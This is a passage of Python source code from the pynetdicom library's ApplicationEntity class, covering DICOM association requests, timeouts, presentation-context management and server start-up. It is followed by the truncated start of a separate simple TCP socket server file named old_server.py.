The local Application Entity's AE title.
"""
return self._ae_title
@ae_title.setter
def ae_title(self, value: str) -> None:
"""Set the AE title using :class:`str`."""
if isinstance(value, bytes):
warnings.warn(
"The use of bytes with 'ae_title' is deprecated, use an ASCII "
"str instead",
DeprecationWarning,
)
value = decode_bytes(value)
self._ae_title = cast(str, set_ae(value, "ae_title", False, False))
def associate(
self,
addr: str,
port: int,
contexts: Optional[ListCXType] = None,
ae_title: str = "ANY-SCP",
max_pdu: int = DEFAULT_MAX_LENGTH,
ext_neg: Optional[List[_UI]] = None,
bind_address: Tuple[str, int] = BIND_ADDRESS,
tls_args: Optional[Tuple[SSLContext, str]] = None,
evt_handlers: Optional[List[EventHandlerType]] = None,
) -> Association:
"""Request an association with a remote AE.
An :class:`~pynetdicom.association.Association` thread is returned
whether or not the association is accepted and should be checked using
:attr:`Association.is_established
<pynetdicom.association.Association.is_established>`
before sending any messages. The returned thread will only be running
if the association was established.
.. versionchanged:: 1.2
Added `bind_address` and `tls_args` keyword parameters
.. versionchanged:: 1.3
Added `evt_handlers` keyword parameter
.. versionchanged:: 1.5
`evt_handlers` now takes a list of 2- or 3-tuples
.. versionchanged:: 2.0
* `ae_title` should now be :class:`str`
* The default `bind_address` was changed to ``("127.0.0.1", 0)``
Parameters
----------
addr : str
The peer AE's TCP/IP address.
port : int
The peer AE's listen port number.
contexts : list of presentation.PresentationContext, optional
The presentation contexts that will be requested by the AE for
support by the peer. If not used then the presentation contexts in
the :attr:`requested_contexts` property will be requested instead.
ae_title : str, optional
The peer's AE title, will be used as the *Called AE Title*
parameter value (default ``'ANY-SCP'``).
max_pdu : int, optional
The :dcm:`maximum PDV receive size<part08/chapter_D.html#sect_D.1>`
in bytes to use when negotiating the association (default
``16382``). A value of ``0`` means the PDV size is unlimited.
ext_neg : list of UserInformation objects, optional
A list containing optional extended negotiation items:
.. currentmodule:: pynetdicom.pdu_primitives
* :class:`AsynchronousOperationsWindowNegotiation` (0 or 1 item)
* :class:`~SCP_SCU_RoleSelectionNegotiation` (0 to N items)
* :class:`~SOPClassCommonExtendedNegotiation` (0 to N items)
* :class:`~SOPClassExtendedNegotiation` (0 to N items)
* :class:`~UserIdentityNegotiation` (0 or 1 item)
bind_address : 2-tuple, optional
The (host, port) to bind the association's communication socket
to, default ``("127.0.0.1", 0)``.
tls_args : 2-tuple, optional
If TLS is required then this should be a 2-tuple containing a
(`ssl_context`, `server_hostname`), where `ssl_context` is the
:class:`ssl.SSLContext` instance to use to wrap the client socket
and `server_hostname` is the value to use for the corresponding
keyword argument in :meth:`~ssl.SSLContext.wrap_socket`. If no
`tls_args` is supplied then TLS will not be used (default).
evt_handlers : list of 2- or 3-tuple, optional
A list of (*event*, *handler*) or (*event*, *handler*, *args*),
where `event` is an ``evt.EVT_*`` event tuple, `handler` is a
callable function that will be bound to the event and `args` is a
:class:`list` of objects that will be passed to `handler` as
optional extra arguments. At a minimum, `handler` should take an
:class:`~pynetdicom.events.Event` parameter and may return or yield
objects depending on the exact event that the handler is bound to.
For more information see the :ref:`documentation<user_events>`.
Returns
-------
assoc : association.Association
If the association was established then a running
:class:`~pynetdicom.association.Association` thread, otherwise
returns a thread that hasn't been started.
Raises
------
RuntimeError
If called with no requested presentation contexts (i.e. `contexts`
has not been supplied and
:attr:`~pynetdicom.ae.ApplicationEntity.requested_contexts` is
empty).
"""
if not isinstance(addr, str):
raise TypeError("'addr' must be a valid IPv4 string")
if not isinstance(port, int):
raise TypeError("'port' must be a valid port number")
# Association
assoc = Association(self, MODE_REQUESTOR)
# Set the thread name
timestamp = datetime.strftime(datetime.now(), "%Y%m%d%H%M%S")
assoc.name = f"RequestorThread@{timestamp}"
# Setup the association's communication socket
sock = self._create_socket(assoc, bind_address, tls_args)
assoc.set_socket(sock)
# Association Acceptor object -> remote AE
# `ae_title` validation is performed by the ServiceUser
assoc.acceptor.ae_title = ae_title
assoc.acceptor.address = addr
assoc.acceptor.port = port
# Association Requestor object -> local AE
assoc.requestor.address = sock.get_local_addr()
assoc.requestor.port = bind_address[1]
assoc.requestor.ae_title = self.ae_title
assoc.requestor.maximum_length = max_pdu
assoc.requestor.implementation_class_uid = self.implementation_class_uid
assoc.requestor.implementation_version_name = self.implementation_version_name
for item in ext_neg or []:
assoc.requestor.add_negotiation_item(item)
# Requestor's presentation contexts
contexts = contexts or self.requested_contexts
self._validate_requested_contexts(contexts)
# PS3.8 Table 9.11, an A-ASSOCIATE-RQ must contain one or more
# Presentation Context items
if not contexts:
raise RuntimeError(
"At least one requested presentation context is required "
"before associating with a peer"
)
# Set using a copy of the original to play nicely
contexts = deepcopy(contexts)
# Add the context IDs
for ii, context in enumerate(contexts):
context.context_id = 2 * ii + 1
assoc.requestor.requested_contexts = contexts
# Bind events to the handlers
evt_handlers = evt_handlers or []
for evt_hh_args in evt_handlers:
assoc.bind(*evt_hh_args)
# Send an A-ASSOCIATE request to the peer and start negotiation
assoc.request()
# If the result of the negotiation was acceptance then start up
# the Association thread
if assoc.is_established:
assoc.start()
return assoc
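# Illustrative requestor sketch (not part of the class API; the peer address,
# port and the use of C-ECHO are assumptions for illustration only):
#
#     from pynetdicom import AE
#     from pynetdicom.sop_class import Verification
#
#     ae = AE()
#     ae.add_requested_context(Verification)
#     assoc = ae.associate("127.0.0.1", 11112)
#     if assoc.is_established:
#         status = assoc.send_c_echo()
#         assoc.release()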
def _create_socket(
self,
assoc: Association,
address: Tuple[str, int],
tls_args: Optional[Tuple[SSLContext, str]],
) -> AssociationSocket:
"""Create an :class:`~pynetdicom.transport.AssociationSocket` for the
current association.
.. versionadded:: 1.5
"""
sock = AssociationSocket(assoc, address=address)
sock.tls_args = tls_args
return sock
@property
def connection_timeout(self) -> Optional[float]:
"""Get or set the connection timeout (in seconds).
.. versionadded:: 2.0
Parameters
----------
value : int, float or None
The maximum amount of time (in seconds) to wait for a TCP
connection to be established. A value of ``None`` (default) means
no timeout. The value is passed to `socket.settimeout()
<https://docs.python.org/3/library/
socket.html#socket.socket.settimeout>`_
and is only used during the connection phase of an association
request.
"""
return self._connection_timeout
@connection_timeout.setter
def connection_timeout(self, value: Optional[float]) -> None:
"""Set the connection timeout."""
if value is None:
self._connection_timeout = None
# Explicitly excluding zero - this would make the socket non-blocking
elif isinstance(value, (int, float)) and value > 0:
self._connection_timeout = value
else:
LOGGER.warning("connection_timeout set to None")
self._connection_timeout = None
for assoc in self.active_associations:
assoc.connection_timeout = self.connection_timeout
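# Illustrative usage (the value is an assumption): ``ae.connection_timeout = 30``
# limits how long a TCP connection attempt made by ``associate()`` may take,
# while ``None`` (the default) applies no timeout.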
@property
def dimse_timeout(self) -> Optional[float]:
"""Get or set the DIMSE timeout (in seconds).
Parameters
----------
value : int, float or None
The maximum amount of time (in seconds) to wait for DIMSE related
messages. A value of ``None`` means no timeout (default: ``30``).
"""
return self._dimse_timeout
@dimse_timeout.setter
def dimse_timeout(self, value: Optional[float]) -> None:
"""Set the DIMSE timeout in seconds."""
if value is None:
self._dimse_timeout = None
elif isinstance(value, (int, float)) and value >= 0:
self._dimse_timeout = value
else:
LOGGER.warning("dimse_timeout set to 30 s")
self._dimse_timeout = 30
for assoc in self.active_associations:
assoc.dimse_timeout = self.dimse_timeout
@property
def implementation_class_uid(self) -> UID:
"""Get or set the *Implementation Class UID* as
:class:`~pydicom.uid.UID`.
Parameters
----------
value : str or pydicom.uid.UID
The association request's *Implementation Class UID* value.
"""
return self._implementation_uid
@implementation_class_uid.setter
def implementation_class_uid(self, value: str) -> None:
"""Set the *Implementation Class UID* used in association requests."""
uid = cast(UID, set_uid(value, "implementation_class_uid", False, False, True))
# Enforce conformance on users
if not uid.is_valid:
raise ValueError(f"Invalid 'implementation_class_uid' value '{uid}'")
self._implementation_uid = uid
@property
def implementation_version_name(self) -> Optional[str]:
"""Get or set the *Implementation Version Name* as :class:`str`.
Parameters
----------
value : str or None
If set then an *Implementation Version Name* item with the
corresponding value will be added to the association request,
otherwise no item will be sent.
Returns
-------
str or None
The set *Implementation Version Name*.
"""
return self._implementation_version
@implementation_version_name.setter
def implementation_version_name(self, value: Optional[str]) -> None:
"""Set the *Implementation Version Name*"""
# We allow None, but not an empty str
if isinstance(value, str) and not value:
raise ValueError(
"Invalid 'implementation_version_name' value - must not be "
"an empty str"
)
self._implementation_version = set_ae(value, "implementation_version_name")
def make_server(
self,
address: Tuple[str, int],
ae_title: Optional[str] = None,
contexts: Optional[ListCXType] = None,
ssl_context: Optional[SSLContext] = None,
evt_handlers: Optional[List[EventHandlerType]] = None,
server_class: Optional[Type[_T]] = None,
**kwargs: Any,
) -> Union[_T, ThreadedAssociationServer]:
"""Return an association server.
.. versionadded:: 1.5
Allows the use of a custom association server class.
Accepts the same parameters as :meth:`start_server`. Additional keyword
parameters are passed to the constructor of `server_class`.
.. versionchanged:: 2.0
`ae_title` should now be :class:`str`
Parameters
----------
server_class : object, optional
The class object to use when creating the server. Defaults to
:class:`~pynetdicom.transport.AssociationServer` if not used.
Returns
-------
object
The object passed via `server_class` or the
:class:`~pynetdicom.transport.AssociationServer`.
"""
# If the SCP has no supported SOP Classes then there's no point
# running as a server
unrestricted = _config.UNRESTRICTED_STORAGE_SERVICE
if not unrestricted and not contexts and not self.supported_contexts:
msg = "No supported Presentation Contexts have been defined"
LOGGER.error(msg)
raise ValueError(msg)
ae_title = ae_title if ae_title else self.ae_title
if isinstance(ae_title, bytes):
warnings.warn(
"The use of bytes with 'ae_title' is deprecated, use an "
"ASCII str instead",
DeprecationWarning,
)
ae_title = decode_bytes(ae_title)
ae_title = cast(str, set_ae(ae_title, "ae_title", False, False))
contexts = contexts or self.supported_contexts
bad_contexts = []
for cx in contexts:
roles = (cx.scu_role, cx.scp_role)
if None in roles and roles != (None, None):
bad_contexts.append(cx.abstract_syntax)
if bad_contexts:
msg = (
"The following presentation contexts have inconsistent "
"scu_role/scp_role values (if one is None, both must be):\n "
)
msg += "\n ".join([str(cx) for cx in bad_contexts])
raise ValueError(msg)
server_class = server_class or AssociationServer # type: ignore[assignment]
return server_class( # type: ignore
self,
address,
ae_title,
contexts,
ssl_context,
evt_handlers=evt_handlers or [],
**kwargs,
)
@property
def maximum_associations(self) -> int:
"""Get or set the number of maximum simultaneous associations as
:class:`int`.
Parameters
----------
value : int
The maximum number of simultaneous associations requested by remote
AEs. This does not include the number of associations
requested by the local AE (default ``10``).
"""
return self._maximum_associations
@maximum_associations.setter
def maximum_associations(self, value: int) -> None:
"""Set the number of maximum associations."""
if isinstance(value, int) and value >= 1:
self._maximum_associations = value
else:
LOGGER.warning("maximum_associations set to 1")
self._maximum_associations = 1
@property
def maximum_pdu_size(self) -> int:
"""Get or set the maximum PDU size accepted by the AE as :class:`int`.
Parameters
----------
value : int
The maximum PDU receive size in bytes. A value of ``0`` means the
PDU size is unlimited (default: ``16382``). Increasing this value
or setting it to unlimited is an effective way of improving the
throughput when sending large amounts of data due to the reduced
DIMSE messaging overhead.
"""
return self._maximum_pdu_size
@maximum_pdu_size.setter
def maximum_pdu_size(self, value: int) -> None:
"""Set the maximum PDU size."""
# Bounds and type checking of the received maximum length of the
# variable field of P-DATA-TF PDUs (in bytes)
# * Must be numerical, greater than or equal to 0 (0 indicates
# no maximum length) (PS3.8 Annex D.1.1)
if value >= 0:
self._maximum_pdu_size = value
else:
# Fall back to the default so the behaviour matches the warning message
LOGGER.warning(f"maximum_pdu_size set to {DEFAULT_MAX_LENGTH}")
self._maximum_pdu_size = DEFAULT_MAX_LENGTH
@property
def network_timeout(self) -> Optional[float]:
"""Get or set the network timeout (in seconds).
Parameters
----------
value : int, float or None
The maximum amount of time (in seconds) to wait for network
messages. A value of ``None`` means no timeout (default: ``60``).
"""
return self._network_timeout
@network_timeout.setter
def network_timeout(self, value: Optional[float]) -> None:
"""Set the network timeout."""
if value is None:
self._network_timeout = None
elif isinstance(value, (int, float)) and value >= 0:
self._network_timeout = value
else:
LOGGER.warning("network_timeout set to 60 s")
self._network_timeout = 60
for assoc in self.active_associations:
assoc.network_timeout = self.network_timeout
def remove_requested_context(
self,
abstract_syntax: Union[str, UID],
transfer_syntax: TSyntaxType = None,
) -> None:
"""Remove a requested presentation context.
Depending on the supplied parameters one of the following will occur:
* `abstract_syntax` alone - all contexts with a matching abstract
syntax will be removed.
* `abstract_syntax` and `transfer_syntax` - for all contexts with a
matching abstract syntax; if the supplied `transfer_syntax` list
contains all of the context's requested transfer syntaxes then the
entire context will be removed. Otherwise only the matching transfer
syntaxes will be removed from the context (and the context will
remain with one or more transfer syntaxes).
Parameters
----------
abstract_syntax : str, pydicom.uid.UID or sop_class.SOPClass
The abstract syntax of the presentation context you wish to stop
requesting when sending association requests.
transfer_syntax : UID str or list of UID str, optional
The transfer syntax(es) you wish to stop requesting. If a list of
str/UID then only those transfer syntaxes specified will no longer
be requested. If not specified then the abstract syntax and all
associated transfer syntaxes will no longer be requested (default).
Examples
--------
Remove all requested presentation contexts with an abstract syntax of
*Verification SOP Class* using its UID value.
>>> from pynetdicom import AE
>>> ae = AE()
>>> ae.add_requested_context('1.2.840.10008.1.1')
>>> print(ae.requested_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
=Explicit VR Little Endian
=Explicit VR Big Endian
>>> ae.remove_requested_context('1.2.840.10008.1.1')
>>> len(ae.requested_contexts)
0
Remove all requested presentation contexts with an abstract syntax of
*Verification SOP Class* using the inbuilt
:class:`~pynetdicom.sop_class.Verification` object.
>>> from pynetdicom import AE
>>> from pynetdicom.sop_class import Verification
>>> ae = AE()
>>> ae.add_requested_context(Verification)
>>> ae.remove_requested_context(Verification)
>>> len(ae.requested_contexts)
0
For all requested presentation contexts with an abstract syntax of
*Verification SOP Class*, stop requesting a transfer syntax of
*Implicit VR Little Endian*. If a presentation context exists which
only has a single *Implicit VR Little Endian* transfer syntax then
it will be completely removed, otherwise it will be kept with its
remaining transfer syntaxes.
Presentation context has only a single matching transfer syntax:
>>> from pydicom.uid import ImplicitVRLittleEndian
>>> from pynetdicom import AE
>>> from pynetdicom.sop_class import Verification
>>> ae.add_requested_context(Verification, ImplicitVRLittleEndian)
>>> print(ae.requested_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
>>> ae.remove_requested_context(Verification, ImplicitVRLittleEndian)
>>> len(ae.requested_contexts)
0
Presentation context has at least one remaining transfer syntax:
>>> from pydicom.uid import ImplicitVRLittleEndian, ExplicitVRLittleEndian
>>> from pynetdicom import AE
>>> from pynetdicom.sop_class import Verification
>>> ae = AE()
>>> ae.add_requested_context(Verification)
>>> print(ae.requested_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
=Explicit VR Little Endian
=Explicit VR Big Endian
>>> ae.remove_requested_context(
... Verification, [ImplicitVRLittleEndian, ExplicitVRLittleEndian]
... )
>>> print(ae.requested_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Explicit VR Big Endian
"""
abstract_syntax = UID(abstract_syntax)
# Get all the current requested contexts with the same abstract syntax
matching_contexts = [
cntx
for cntx in self.requested_contexts
if cntx.abstract_syntax == abstract_syntax
]
if isinstance(transfer_syntax, str):
transfer_syntax = [transfer_syntax]
if transfer_syntax is None:
# If no transfer_syntax then remove the context completely
for context in matching_contexts:
self._requested_contexts.remove(context)
else:
for context in matching_contexts:
for tsyntax in transfer_syntax:
if tsyntax in context.transfer_syntax:
context.transfer_syntax.remove(UID(tsyntax))
# Only if all transfer syntaxes have been removed then
# remove the context
if not context.transfer_syntax:
self._requested_contexts.remove(context)
def remove_supported_context(
self,
abstract_syntax: Union[str, UID],
transfer_syntax: TSyntaxType = None,
) -> None:
"""Remove a supported presentation context.
Depending on the supplied parameters one of the following will occur:
* `abstract_syntax` alone - the entire supported context will be
removed.
* `abstract_syntax` and `transfer_syntax` - If the supplied
`transfer_syntax` list contains all of the context's supported
transfer syntaxes then the entire context will be removed.
Otherwise only the matching transfer syntaxes will be removed from
the context (and the context will remain with one or more transfer
syntaxes).
Parameters
----------
abstract_syntax : str, pydicom.uid.UID or sop_class.SOPClass
The abstract syntax of the presentation context you wish to stop
supporting.
transfer_syntax : UID str or list of UID str, optional
The transfer syntax(es) you wish to stop supporting. If a list of
str/UID then only those transfer syntaxes specified will no longer
be supported. If not specified then the abstract syntax and all
associated transfer syntaxes will no longer be supported (default).
Examples
--------
Remove the supported presentation context with an abstract syntax of
*Verification SOP Class* using its UID value.
>>> from pynetdicom import AE
>>> ae = AE()
>>> ae.add_supported_context('1.2.840.10008.1.1')
>>> print(ae.supported_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
=Explicit VR Little Endian
=Explicit VR Big Endian
>>> ae.remove_supported_context('1.2.840.10008.1.1')
>>> len(ae.supported_contexts)
0
Remove the supported presentation context with an abstract syntax of
*Verification SOP Class* using the inbuilt
:class:`~pynetdicom.sop_class.Verification` object.
>>> from pynetdicom import AE, VerificationPresentationContexts
>>> from pynetdicom.sop_class import Verification
>>> ae = AE()
>>> ae.supported_contexts = VerificationPresentationContexts
>>> ae.remove_supported_context(Verification)
For the presentation contexts with an abstract syntax of
*Verification SOP Class*, stop supporting the *Implicit VR Little
Endian* transfer syntax. If the presentation context only has the
single *Implicit VR Little Endian* transfer syntax then it will be
completely removed, otherwise it will be kept with the remaining
transfer syntaxes.
Presentation context has only a single matching transfer syntax:
>>> from pydicom.uid import ImplicitVRLittleEndian
>>> from pynetdicom import AE
>>> from pynetdicom.sop_class import Verification
>>> ae = AE()
>>> ae.add_supported_context(Verification, ImplicitVRLittleEndian)
>>> print(ae.supported_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
>>> ae.remove_supported_context(Verification, ImplicitVRLittleEndian)
>>> len(ae.supported_contexts)
0
Presentation context has at least one remaining transfer syntax:
>>> from pydicom.uid import ImplicitVRLittleEndian, ExplicitVRLittleEndian
>>> from pynetdicom import AE
>>> from pynetdicom.sop_class import Verification
>>> ae = AE()
>>> ae.add_supported_context(Verification)
>>> print(ae.supported_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
=Explicit VR Little Endian
=Explicit VR Big Endian
>>> ae.remove_supported_context(
... Verification, [ImplicitVRLittleEndian, ExplicitVRLittleEndian]
... )
>>> print(ae.supported_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Explicit VR Big Endian
"""
abstract_syntax = UID(abstract_syntax)
if isinstance(transfer_syntax, str):
transfer_syntax = [transfer_syntax]
# Check abstract syntax is actually present
# We don't warn if it isn't present because in that case it's already
# unsupported and the user's intent has been satisfied
if abstract_syntax in self._supported_contexts:
if transfer_syntax is None:
# If no transfer_syntax then remove the context completely
del self._supported_contexts[abstract_syntax]
else:
# If transfer_syntax then only remove matching syntaxes
context = self._supported_contexts[abstract_syntax]
for tsyntax in transfer_syntax:
if tsyntax in context.transfer_syntax:
context.transfer_syntax.remove(UID(tsyntax))
# Only if all transfer syntaxes have been removed then remove
# the context
if not context.transfer_syntax:
del self._supported_contexts[abstract_syntax]
@property
def requested_contexts(self) -> ListCXType:
"""Get or set a list of the requested
:class:`~pynetdicom.presentation.PresentationContext` items.
Examples
--------
Set the requested presentation contexts using an inbuilt list of
service specific :class:`~pynetdicom.presentation.PresentationContext`
items:
>>> from pynetdicom import AE, StoragePresentationContexts
>>> ae = AE()
>>> ae.requested_contexts = StoragePresentationContexts
Set the requested presentation contexts using a :class:`list` of
:class:`~pynetdicom.presentation.PresentationContext` items:
>>> from pydicom.uid import ImplicitVRLittleEndian
>>> from pynetdicom import AE
>>> from pynetdicom.presentation import PresentationContext
>>> context = PresentationContext()
>>> context.abstract_syntax = '1.2.840.10008.1.1'
>>> context.transfer_syntax = [ImplicitVRLittleEndian]
>>> ae = AE()
>>> ae.requested_contexts = [context]
>>> print(ae.requested_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
Parameters
----------
contexts : list of PresentationContext
The presentation contexts to request when acting as an SCU.
Raises
------
ValueError
If trying to add more than 128 requested presentation contexts.
See Also
--------
ApplicationEntity.add_requested_context
Add a single presentation context to the requested contexts using
an abstract syntax and (optionally) a list of transfer syntaxes.
"""
return self._requested_contexts
@requested_contexts.setter
def requested_contexts(self, contexts: ListCXType) -> None:
"""Set the requested presentation contexts."""
if not contexts:
self._requested_contexts = []
return
self._validate_requested_contexts(contexts)
for context in contexts:
self.add_requested_context(
cast(UID, context.abstract_syntax), context.transfer_syntax
)
@property
def require_called_aet(self) -> bool:
"""Get or set whether the *Called AE Title* must match the AE title.
When an association request is received the value of the *Called AE
Title* supplied by the peer will be compared with :attr:`ae_title` and
if they don't match the association will be rejected. If set to
``False`` (default) then the *Called AE Title* will not be checked.
.. versionchanged:: 1.1
`require_match` changed to ``bool``
Parameters
----------
require_match : bool
If ``True`` then any association requests that supply a
*Called AE Title* value that does not match :attr:`ae_title`
will be rejected. If ``False`` (default) then all association
requests will be accepted (unless rejected for other reasons).
"""
return self._require_called_aet
@require_called_aet.setter
def require_called_aet(self, require_match: bool) -> None:
"""Set whether the *Called AE Title* must match the AE title."""
self._require_called_aet = require_match
@property
def require_calling_aet(self) -> List[str]:
"""Get or set the required calling AE title as a list of :class:`str`.
When an association request is received the value of the *Calling AE
Title* supplied by the peer will be compared with the set value and
if none match the association will be rejected. If the set value
is an empty list then the *Calling AE Title* will not be checked.
.. versionchanged:: 1.1
`ae_titles` changed to :class:`list` of :class:`bytes`
.. versionchanged:: 2.0
`ae_titles` should now be a :class:`list` of :class:`str`
Parameters
----------
ae_titles : list of str
If not empty then any association requests that supply a
*Calling AE Title* value that does not match one of the values in
*ae_titles* will be rejected. If an empty list (default) then all
association requests will be accepted (unless rejected for other
reasons).
"""
return self._require_calling_aet
@require_calling_aet.setter
def require_calling_aet(self, ae_titles: List[str]) -> None:
"""Set the required calling AE title."""
if any([isinstance(v, bytes) for v in ae_titles]):
warnings.warn(
"The use of a list of bytes with 'require_calling_aet' is "
"deprecated, use a list of ASCII str instead",
DeprecationWarning,
)
values = []
for v in ae_titles:
if isinstance(v, bytes):
v = decode_bytes(v)
values.append(cast(str, set_ae(v, "require_calling_aet", False, False)))
self._require_calling_aet = values
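# Illustrative usage (the AE title value is an assumption):
# ``ae.require_calling_aet = ["STORE_SCU"]`` rejects any association request
# whose *Calling AE Title* is not ``"STORE_SCU"``; an empty list (the default)
# accepts all callers.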
def shutdown(self) -> None:
"""Stop any active association servers and threads.
.. versionadded:: 1.2
"""
for assoc in self.active_associations:
assoc.abort()
# This is a bit hackish: server.shutdown() removes the server
# from `_servers`, so iterate over a copy to work around this
for server in self._servers[:]:
server.shutdown()
self._servers = []
def start_server(
self,
address: Tuple[str, int],
block: bool = True,
ssl_context: Optional[SSLContext] = None,
evt_handlers: Optional[List[EventHandlerType]] = None,
ae_title: Optional[str] = None,
contexts: Optional[ListCXType] = None,
) -> Optional[ThreadedAssociationServer]:
"""Start the AE as an association *acceptor*.
.. versionadded:: 1.2
If set to non-blocking then a running
:class:`~pynetdicom.transport.ThreadedAssociationServer`
instance will be returned. This can be stopped using
:meth:`~pynetdicom.transport.AssociationServer.shutdown`.
.. versionchanged:: 1.3
Added `evt_handlers` keyword parameter
.. versionchanged:: 1.4
Added `ae_title` and `contexts` keyword parameters
.. versionchanged:: 1.5
`evt_handlers` now takes a list of 2- or 3-tuples
.. versionchanged:: 2.0
`ae_title` should now be :class:`str`
Parameters
----------
address : Tuple[str, int]
The ``(host: str, port: int)`` to use when listening for incoming
association requests.
block : bool, optional
If ``True`` (default) then the server will be blocking, otherwise
it will start the server in a new thread and be non-blocking.
ssl_context : ssl.SSLContext, optional
If TLS is required then this should the :class:`ssl.SSLContext`
instance to use to wrap the client sockets, otherwise if ``None``
then no TLS will be used (default).
evt_handlers : list of 2- or 3-tuple, optional
A list of (*event*, *handler*) or (*event*, *handler*, *args*),
where `event` is an ``evt.EVT_*`` event tuple, `handler` is a
callable function that will be bound to the event and `args` is a
:class:`list` of objects that will be passed to `handler` as
optional extra arguments. At a minimum, `handler` should take an
:class:`~pynetdicom.events.Event` parameter and may return or yield
objects depending on the exact event that the handler is bound to.
For more information see the :ref:`documentation<user_events>`.
ae_title : str, optional
The AE title to use for the local SCP. If this keyword parameter
is not used then the AE title from the :attr:`ae_title` property
will be used instead (default).
contexts : list of presentation.PresentationContext, optional
The presentation contexts that will be supported by the SCP. If
not used then the presentation contexts in the
:attr:`supported_contexts` property will be used instead (default).
Returns
-------
transport.ThreadedAssociationServer or None
If `block` is ``False`` then returns the server instance, otherwise
returns ``None``.
"""
if block:
# Blocking server
server = self.make_server(
address,
ae_title=ae_title,
contexts=contexts,
ssl_context=ssl_context,
evt_handlers=evt_handlers,
)
self._servers.append(server)
try:
# **BLOCKING**
server.serve_forever()
except KeyboardInterrupt:
server.shutdown()
return None
# Non-blocking server
timestamp = datetime.strftime(datetime.now(), "%Y%m%d%H%M%S")
server = self.make_server(
address,
ae_title=ae_title,
contexts=contexts,
ssl_context=ssl_context,
evt_handlers=evt_handlers,
server_class=ThreadedAssociationServer,
)
thread = threading.Thread(
target=make_target(server.serve_forever), name=f"AcceptorServer@{timestamp}"
)
thread.daemon = True
thread.start()
self._servers.append(server)
return server
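# Illustrative acceptor sketch (not part of the class API; the port and the
# C-ECHO handler are assumptions for illustration only):
#
#     from pynetdicom import AE, evt
#     from pynetdicom.sop_class import Verification
#
#     def handle_echo(event):
#         return 0x0000  # Success
#
#     ae = AE()
#     ae.add_supported_context(Verification)
#     # block=False returns a ThreadedAssociationServer that can later be shut down
#     server = ae.start_server(
#         ("127.0.0.1", 11112), block=False,
#         evt_handlers=[(evt.EVT_C_ECHO, handle_echo)],
#     )
#     ...
#     server.shutdown()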
def __str__(self) -> str:
"""Prints out the attribute values and status for the AE"""
s = [""]
s.append(f"Application Entity {self.ae_title}")
s.append("")
s.append(" Requested Presentation Contexts:")
if not self.requested_contexts:
s.append("\tNone")
for context in self.requested_contexts:
s.append(f"\t{cast(UID, context.abstract_syntax).name}")
for transfer_syntax in context.transfer_syntax:
s.append(f"\t\t{transfer_syntax.name}")
s.append("")
s.append(" Supported Presentation Contexts:")
if not self.supported_contexts:
s.append("\tNone")
for context in self.supported_contexts:
s.append(f"\t{cast(UID, context.abstract_syntax).name}")
for transfer_syntax in context.transfer_syntax:
s.append(f"\t\t{transfer_syntax.name}")
s.append("")
s.append(f" ACSE timeout: {self.acse_timeout} s")
s.append(f" DIMSE timeout: {self.dimse_timeout} s")
s.append(f" Network timeout: {self.network_timeout} s")
s.append(f" Connection timeout: {self.connection_timeout} s")
s.append("")
if self.require_calling_aet != []:
ae_titles = self.require_calling_aet
s.append((f" Required calling AE title(s): {', '.join(ae_titles)}"))
s.append(f" Require called AE title: {self.require_called_aet}")
s.append("")
# Association information
s.append(
f" Association(s): {len(self.active_associations)}"
f"/{self.maximum_associations}"
)
for assoc in self.active_associations:
s.append(
f"\tPeer: {assoc.remote['ae_title']} on "
f"{assoc.remote['address']}:{assoc.remote['port']}"
)
return "\n".join(s)
@property
def supported_contexts(self) -> ListCXType:
"""Get or set a list of the supported
:class:`~pynetdicom.presentation.PresentationContext` items.
Examples
--------
Set the supported presentation contexts using a list of
``PresentationContext`` items:
>>> from pydicom.uid import ImplicitVRLittleEndian
>>> from pynetdicom import AE
>>> from pynetdicom.presentation import PresentationContext
>>> context = PresentationContext()
>>> context.abstract_syntax = '1.2.840.10008.1.1'
>>> context.transfer_syntax = [ImplicitVRLittleEndian]
>>> ae = AE()
>>> ae.supported_contexts = [context]
Set the supported presentation contexts using an inbuilt list of
service specific :class:`~pynetdicom.presentation.PresentationContext`
items:
>>> from pynetdicom import AE, StoragePresentationContexts
>>> ae = AE()
>>> ae.supported_contexts = StoragePresentationContexts
Parameters
----------
contexts : list of presentation.PresentationContext
The presentation contexts to support when acting as an SCP.
See Also
--------
ApplicationEntity.add_supported_context
Add a single presentation context to the supported contexts using
an abstract syntax and optionally a list of transfer syntaxes.
"""
# The supported presentation contexts are stored internally as a dict
return sorted(
list(self._supported_contexts.values()),
key=lambda cx: cast(UID, cx.abstract_syntax),
)
@supported_contexts.setter
def supported_contexts(self, contexts: ListCXType) -> None:
"""Set the supported presentation contexts using a list."""
if not contexts:
self._supported_contexts = {}
for item in contexts:
if not isinstance(item, PresentationContext):
raise ValueError(
"'contexts' must be a list of PresentationContext items"
)
self.add_supported_context(
cast(UID, item.abstract_syntax), item.transfer_syntax
)
@staticmethod
def _validate_requested_contexts(contexts: ListCXType) -> None:
"""Validate the supplied `contexts`.
Parameters
----------
contexts : list of presentation.PresentationContext
The contexts to validate.
"""
if len(contexts) > 128:
raise ValueError(
"The maximum allowed number of requested presentation "
"contexts is 128"
)
invalid = [ii for ii in contexts if not isinstance(ii, PresentationContext)]
if invalid:
raise ValueError("'contexts' must be a list of PresentationContext items")
|
old_server.py
|
import socket
import threading
import sys
import re
from base64 import b64encode, b64decode
from hashlib import sha1
class Server:
# create socket using TCP
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# create list of connections, consisting of
# 3-tuples of (socket object, address, session_url)
connections = []
# on server class init, bind socket
# to the ip address and port and listen
def __init__(self, ip, port):
self.sock.bind((ip, port))
self.sock.listen(1)
# handles connected socket data
def handler(self, c, a, session_url):
while True:
# a socket sends data to the server
data = c.recv(2048)
# an empty read means the peer disconnected; stop this handler thread
if not data:
break
print(data)
# print(data.decode("utf-8"))
# c.send(b"Server received message")
# for connection in self.connections:
